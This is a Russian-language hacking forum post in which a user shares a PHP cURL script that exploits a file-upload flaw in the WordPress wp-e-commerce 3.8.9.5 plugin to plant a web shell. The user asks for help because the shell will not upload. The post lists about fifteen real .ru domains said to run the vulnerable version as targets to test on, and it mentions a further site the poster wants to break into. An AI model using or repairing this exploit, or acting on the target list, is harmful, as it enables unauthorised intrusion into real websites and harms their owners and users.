Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities

Discussion in 'Песочница' started by SuNDowN, 1 Feb 2014.

  1. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    23
    Likes Received:
    73
    Reputations:
    -8
    Всем привет. Сорри за репост, чтото в ветке WordPress все молчат, может тут кто поможет, итак:
    PHP:
    <?php
    $headers 
    = array("Content-Type: application/octet-stream""Content-Disposition: form-data; name=\"image\"; file=\"onlyimage.gif\";");
    $uploadfile="file.php";
    $ch curl_init("http://DOMAIN/wp-content/plugins/wp-e-commerce/wpsc-admin/includes/save-data.functions.php");
    curl_setopt($chCURLOPT_POSTtrue);
    curl_setopt($chCURLOPT_USERAGENT"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt($chCURLOPT_POSTFIELDS, array('image'=>"@$uploadfile"));
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_HTTPHEADER$headers);
    $postResult curl_exec($ch);
    curl_close($ch);
    print 
    "$postResult";
    ?>
    ©Взято от Сюда

    Вот только не заливается шелл немогу понять в чём причина, кто разберется будьте добры помочь, вот Вам домены для теста:
    Code:
    http://1CCLUB.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://40MOBILE.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://4WR.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://9899669.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://AFSERVICE.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://AISBERG24.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://ALL-HTC.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://ALTERKRESLA.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://AMARTCOM.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://angel23.ru/wp-content/plugins/wp-e-commerce/readme.txt
    http://ANTIKFOREVERY1.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://APIKLIN.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://APK-NN.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://ARCHIMEDNOV.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://ARENDAMD.RU/wp-content/plugins/wp-e-commerce/readme.txt
    Домены именно той версии которую требует уязвимость.

    Есть один сайтец хороший, весь облазил, но кроме этой баги ничего не нашёл, а этот скрипт чтот не заливает или я туплю. Помогите разобраться на примере, буду очень признателен.